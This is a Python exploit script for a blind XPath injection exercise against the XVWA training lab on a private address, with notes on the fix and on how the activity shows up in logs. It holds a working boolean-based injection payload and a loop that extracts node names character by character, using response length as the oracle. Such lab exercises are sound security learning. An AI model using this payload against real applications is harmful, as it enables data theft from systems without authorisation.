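#!/usr/bin/env python
"""Boolean-based blind XPath injection exercise against the XVWA lab page.

The script posts a crafted ``search`` value to the XPath page of an XVWA
instance on a private address and rebuilds an XML node name one character
at a time. A guess is accepted when the length of the response body differs
from a fixed baseline, so the page length is the only oracle used.

Defensive notes:

* The payload can only work if the application places the ``search`` value
  inside an XPath expression without escaping it. This is inferred from the
  payload shape; the server code is not shown here.
* Binding user input as XPath variables, or validating it against an
  allow-list before the query is built, removes the oracle.
* In server logs this activity appears as a rapid run of POSTs to a single
  endpoint whose ``search`` field contains ``substring(`` and ``name(``.
"""
import pdb
import signal
import string
import sys
import time

import requests

# Kept last, as in the original, because the wildcard import also provides
# ``log`` and may rebind names imported above.
from pwn import *


# Ctrl-C handler
def signal_handler(signum, frame):
    """Print a notice and exit with status 1 when SIGINT is received."""
    # Parameters renamed from (signal, frame) so the handler no longer
    # shadows the ``signal`` module.
    print('\n\n[!] Ctrl-C. Saliendo...')
    sys.exit(1)


signal.signal(signal.SIGINT, signal_handler)

# Global variables
main_url = "http://192.168.1.142/xvwa/vulnerabilities/xpath/"
characters = string.ascii_letters

# Body length treated as "predicate was false". Presumably measured by hand
# on this lab instance; it must be re-measured if the page changes.
NO_MATCH_LENGTH = 8686

# Seconds to wait for each response, so a stalled server cannot hang the
# script indefinitely.
REQUEST_TIMEOUT = 10


def xPathInjection():
    """Recover up to seven letters of a node name through the length oracle.

    For each position 1..7 every ASCII letter is tried in turn. The first
    letter whose response length differs from ``NO_MATCH_LENGTH`` is kept.
    A position where no letter matches is skipped silently, so the result
    may be shorter than seven characters.

    Any response of a different length is counted as a hit, including an
    error page, so the recovered value should be checked by hand.

    Raises:
        requests.exceptions.RequestException: if a request fails or exceeds
            ``REQUEST_TIMEOUT``.
    """
    data = ""

    p1 = log.progress("Inyeccion XPath")
    p1.status("Iniciando ataque de fuerza bruta")

    time.sleep(2)

    p2 = log.progress("Data")

    for position in range(1, 8):
        for character in characters:
            # Earlier step kept by the author: name of the root element.
            # post_data = {
            #     'search': "1' and substring(name(/*[1]),%d,1)='%s" % (position, character),
            #     'submit': ''
            # }
            # Current step: name of the first child of the root element.
            post_data = {
                'search': "1' and substring(name(/*[1]/*[1]),%d,1)='%s" % (position, character),
                'submit': ''
            }

            r = requests.post(main_url, data=post_data, timeout=REQUEST_TIMEOUT)

            if len(r.text) != NO_MATCH_LENGTH:
                data += character
                p2.status(data)
                break

    p1.success("Inyeccion XPath completada")
    p2.success("Data: %s" % data)


if __name__ == "__main__":
    xPathInjection()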